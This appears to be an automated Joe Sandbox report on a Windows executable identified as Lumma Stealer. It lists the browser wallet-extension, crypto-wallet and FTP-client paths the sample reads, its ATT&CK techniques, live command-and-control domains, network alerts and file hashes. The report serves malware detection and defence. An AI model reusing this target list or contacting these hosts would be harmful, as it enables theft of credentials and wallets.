Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: Yara match File source: 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2556801144.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2736, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: file.exe PID: 2736, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures; techniques without a count are the matrix's default entries with no hits)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (34), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1), Compile After Delivery
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Query Registry (1), Security Software Discovery (751), Virtualization/Sandbox Evasion (34), Process Discovery (2), Application Window Discovery (1), File and Directory Discovery (11), System Information Discovery (223)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML | -

Dropped files, unpacked PE files and domains: No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://crl.microsoft | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta | 0% | URL Reputation | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.96.3 | true | true | - | unknown
presticitpo.store | unknown | unknown | true | - | unknown
thumbystriw.store | unknown | unknown | true | - | unknown
crisiwarny.store | unknown | unknown | true | - | unknown
fadehairucw.store | unknown | unknown | true | - | unknown
Contacted URLs and domains

Name | Malicious | Antivirus Detection | Reputation
presticitpo.store | true | - | unknown
necklacedmny.store | true | - | unknown
fadehairucw.store | true | - | unknown
founpiuer.store | true | - | unknown
crisiwarny.store | true | - | unknown
https://necklacedmny.store/api | true | - | unknown
scriptyprefej.store | true | - | unknown
navygenerayk.store | true | - | unknown
thumbystriw.store | true | - | unknown
URLs found in memory or binary data

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft | file.exe, 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2573744183.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066838400.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575338025.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2573224522.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572097729.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575405463.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572367724.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2556757347.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575066058.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2574473643.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572707975.0000000000D94000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store//tL | file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/api& | file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store/api# | file.exe, 00000000.00000002.3078545799.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074900273.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store/?t | file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/api3 | file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.mozilla.or | file.exe, 00000000.00000003.2558090375.000000000561C000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store:443/api | file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store:443/apiK | file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://crl.microsoft7_6 | file.exe, 00000000.00000003.2728000075.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727444417.0000000000D94000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store/api= | file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738499845.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067105492.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store/apia8&_Z | file.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://necklacedmny.store/apidb | file.exe, 00000000.00000002.3078400834.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D25000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/ | file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066757426.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074641701.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727357507.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067139929.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575762347.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078611352.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727984519.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/api.default-release/key4.dbPK | file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3 | file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apis | file.exe, 00000000.00000003.3066838400.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067227914.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apik | file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738499845.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067105492.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta | file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | necklacedmny.store | European Union | 13335 | CLOUDFLARENETUS | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544423
Start date and time: 2024-10-29 12:03:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 2736 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time | Type | Description
07:04:07 | API Interceptor | 2464377x Sleep call for process: file.exe modified
                                                                                  No context
                                                                                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.575758449772259
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'922'496 bytes
MD5: dc20ee0ac31f3e17cbd727de4644f7aa
SHA1: 7b688e73f50ac2a4241681e996410efeec4e0775
SHA256: d20226e20ceb5d5f0440c642f10506fbdceaa23e3c598478118e46f0dd932990
SHA512: 634b7e8cb488ad49ca9b94e7311c323744eb3c430a45e1e0d077dd4c9a86c882e11a8791aef549627df8686021bc940525bdc53c231a9cdab49ceaff853e8f63
SSDEEP: 49152:aOMADD8jFx7ISH5AFYymmLhglCVGG/H0a5CXbEl1sOR42LL:ZMSD8rsSH5AFYnWKlCVz09ysORTf
TLSH: 9BD54B52F506F1CFD88A16B444A7CE89AE9D43B8473468C3AD9CB4BB7E63CC115BAC14
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.........................../......~-...@.................................T...h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6fb000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x58000 | 0x27e00 | 947668de471bf9e670bc743712c0f3a8 | False | 0.9979489126175548 | data | 7.978490875244356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eijsszyp | 0x5b000 | 0x29f000 | 0x29e200 | cf3ee40f2524db99fed4879a596fe5dc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xxbxeocn | 0x2fa000 | 0x1000 | 0x400 | f3b76677b48dfbdffa15417e39167c45 | False | 0.734375 | data | 5.904217744273698 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2fb000 | 0x3000 | 0x2200 | 85d72af0b7f23f8ac3b158372fc683fd | False | 0.08409926470588236 | DOS executable (COM) | 0.8608863210046287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T12:04:10.277153+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:10.277153+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:12.556685+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:12.556685+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:50.576456+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49712 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 12:04:08.899007082 CET | 56631 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 12:04:08.908905029 CET | 53 | 56631 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 12:04:08.915142059 CET | 62553 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 12:04:08.924704075 CET | 53 | 62553 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 12:04:08.925952911 CET | 53618 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 12:04:08.940785885 CET | 53 | 53618 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 12:04:08.942332029 CET | 57868 | 53 | 192.168.2.6 | 1.1.1.1
